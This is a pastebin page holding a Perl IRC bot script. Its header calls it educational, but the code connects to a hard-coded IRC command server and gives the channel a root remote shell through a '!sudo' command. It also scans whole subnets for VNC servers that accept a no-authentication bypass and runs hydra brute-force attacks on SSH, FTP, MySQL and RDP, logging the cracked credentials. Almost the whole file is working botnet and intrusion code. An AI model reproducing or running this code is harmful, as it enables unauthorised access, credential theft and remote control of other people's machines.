SHOW:
|
|
- or go back to the newest paste.
1 | #For educational purposes or for use on your network only | |
2 | #This script has been modified from the original source. | |
3 | #Thanks to the real owner of it. | |
4 | #Get on my IRC Network if you need explainations on how you can use this script. | |
5 | ||
6 | ||
7 | use IO::Socket; | |
8 | use IO::Socket::INET; | |
9 | use threads; | |
10 | use threads::shared; | |
11 | use Errno qw(EAGAIN); | |
12 | use warnings; | |
13 | my $lines; | |
14 | our @results : shared; | |
15 | our $todo = 0; | |
16 | our $contatore = 0; | |
17 | my $orig_thread = "yes"; | |
18 | my $start; | |
19 | my $end; | |
20 | my $out_file; | |
21 | my $range = 99999; | |
22 | my $random_number = int(rand($range)); | |
23 | my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/; | |
24 | my @hydra_PORTS = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] ); | |
25 | my $splits = 8; # Creates 2^N processes. | |
26 | our $subnet; | |
27 | my $nick = "b0t$random_number";# nick | |
28 | my $secureport = "6667"; | |
29 | my $ircnet = "irc-1.iownyour.biz"; | |
30 | my $canale = "#powercc"; | |
31 | my $answer; | |
32 | my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n"; | |
33 | $sk->autoflush(1); | |
34 | print $sk "USER $nick 0 * :Robot made by independent \r\n"; | |
35 | print $sk "NICK $nick \r\n"; | |
36 | ||
37 | while ($answer = <$sk>) { | |
38 | ||
39 | if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests | |
40 | { | |
41 | ||
42 | print $sk "PONG ".$1."\r\n"; | |
43 | print $sk "JOIN $canale \r\n"; | |
44 | } | |
45 | if ($answer=~ /!help/) { | |
46 | printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>"); | |
47 | } | |
48 | if ($answer=~ /!list/) | |
49 | { | |
50 | ||
51 | my $file = 'xploits.log'; | |
52 | open my $fh, '<', $file or warn "Could not open '$file' $!\n"; | |
53 | ||
54 | while (my $lines = <$fh>) { | |
55 | chomp $lines; | |
56 | if ($lines=~ /host/) { | |
57 | printa("$lines"); | |
58 | } | |
59 | } | |
60 | } | |
61 | if ($answer=~ /!reload/) | |
62 | { | |
63 | printa("Reloading..."); | |
64 | my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra"); | |
65 | system(@cmd); | |
66 | } | |
67 | if ($answer=~ /!die/) | |
68 | { | |
69 | printa("Dying..."); | |
70 | my @cmd = ("sudo pkill perl && sudo pkill hydra"); | |
71 | system(@cmd); | |
72 | } | |
73 | if ($answer=~ /!sudo\s+(.*)/) | |
74 | { | |
75 | my $command = $1; | |
76 | printa("Done: $command "); | |
77 | my $cmd = "sudo $command"; | |
78 | my @output = `$cmd 2>&1 3>&1`; | |
79 | foreach(@output) { | |
80 | printa("$_\r\n"); | |
81 | } | |
82 | } | |
83 | ||
84 | ||
85 | if ($answer=~ /!scan (.+)/) | |
86 | { | |
87 | ||
88 | ||
89 | $todo = 0; | |
90 | $subnet = $1; | |
91 | if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) { | |
92 | $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/; | |
93 | $subnet .= "."; | |
94 | printa("Scanning subnet ${subnet}x\n"); | |
95 | ||
96 | CHECK: { | |
97 | unless ($splits >= 0 && $splits <= 8) { | |
98 | die "ERROR: Do not split $splits times--that makes no sense.\n"; | |
99 | } | |
100 | } | |
101 | ||
102 | # Ugly, but this works. | |
103 | DivideWork() if $splits >= 1; | |
104 | DivideWork() if $splits >= 2; | |
105 | DivideWork() if $splits >= 3; | |
106 | DivideWork() if $splits >= 4; | |
107 | DivideWork() if $splits >= 5; | |
108 | DivideWork() if $splits >= 6; | |
109 | DivideWork() if $splits >= 7; | |
110 | DivideWork() if $splits >= 8; | |
111 | ||
112 | $start = $todo << (8 - $splits); | |
113 | $end = $start + (256 / (2**$splits)) - 1; | |
114 | ||
115 | foreach ($start .. $end) { | |
116 | ||
117 | Scan_ALL($_); | |
118 | ||
119 | } | |
120 | } | |
121 | ||
122 | else { | |
123 | printa("Are you brain-dead? Use a correct IP format. "); | |
124 | } | |
125 | ||
126 | } | |
127 | ||
128 | } | |
129 | #################################### | |
130 | ||
131 | sub DivideWork { | |
132 | my $pid; | |
133 | ||
134 | FORK: { | |
135 | $todo *= 2; | |
136 | if ($pid = fork) { | |
137 | # Parent | |
138 | ++$todo; | |
139 | ||
140 | } elsif (defined $pid) { | |
141 | # Child | |
142 | $orig_thread = "no"; | |
143 | ||
144 | } elsif ($! == EAGAIN) { | |
145 | # Recoverable forking error. | |
146 | sleep 7; | |
147 | redo FORK; | |
148 | ||
149 | } else { | |
150 | # Unable to fork. | |
151 | printa("Unable to fork: $!\n"); | |
152 | ||
153 | } | |
154 | } | |
155 | } | |
156 | ||
157 | ||
158 | ||
159 | sub Scan_ALL { | |
160 | my $hostnum = shift; | |
161 | my $host = $subnet . $hostnum; | |
162 | my $sock; | |
163 | my $proto_ver; | |
164 | my $ignored; | |
165 | my $auth_type; | |
166 | my $sec_types; | |
167 | my $vnc_data; | |
168 | $host or printa("ERROR: missing Host IP address Scan_ALL."); | |
169 | ||
170 | # The host numbers .0 and .255 are reserved; ignore them. | |
171 | if ($hostnum <= 0 or $hostnum >= 255) { return; } | |
172 | ||
173 | # Format things nicely--that crazy formula just adds spaces. | |
174 | $results[$hostnum] = "$host"; | |
175 | $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = "; | |
176 | foreach my $porti (@VNC_PORTS) | |
177 | { | |
178 | if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) { | |
179 | ||
180 | $sock->read($proto_ver, 12); | |
181 | print $sock $proto_ver; | |
182 | ||
183 | # Get supported security types and ignore them. | |
184 | $sock->read($sec_types, 1); | |
185 | ||
186 | $sock->read($ignored, unpack('C', $sec_types)); | |
187 | # Claim that we only support no authentication. | |
188 | print $sock "\x01"; | |
189 | ||
190 | ||
191 | # We should get "0000" back, indicating that they won't fall back to no authentication. | |
192 | $sock->read($auth_type, 4); | |
193 | ||
194 | # Client initialize. | |
195 | print $sock "\x01"; | |
196 | ||
197 | # If the server starts sending data, we're in. | |
198 | $sock->read($vnc_data, 4); | |
199 | printa("[Xploiting VNC] $host"); | |
200 | if (unpack('I', $vnc_data)) { | |
201 | $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n"; | |
202 | printa("9,3 [ $porti ] $results[$hostnum] $porti "); | |
203 | } | |
204 | } | |
205 | } | |
206 | foreach my $porti (@hydra_PORTS) | |
207 | { | |
208 | if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) { | |
209 | close($sock); | |
210 | printa("[Cracking " . $porti->[1] . "] $host"); | |
211 | my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log"); | |
212 | system(@cmdhydra); | |
213 | return; | |
214 | } | |
215 | } | |
216 | ||
217 | close($sock); | |
218 | return; | |
219 | } | |
220 | ||
221 | sub printa { | |
222 | print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n"; | |
223 | } |